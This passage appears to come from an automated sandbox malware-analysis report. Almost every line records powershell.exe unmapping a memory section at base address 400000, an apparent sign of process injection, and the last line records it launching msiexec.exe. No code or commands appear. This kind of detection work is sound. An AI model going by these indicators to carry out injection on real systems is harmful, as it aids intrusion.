    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
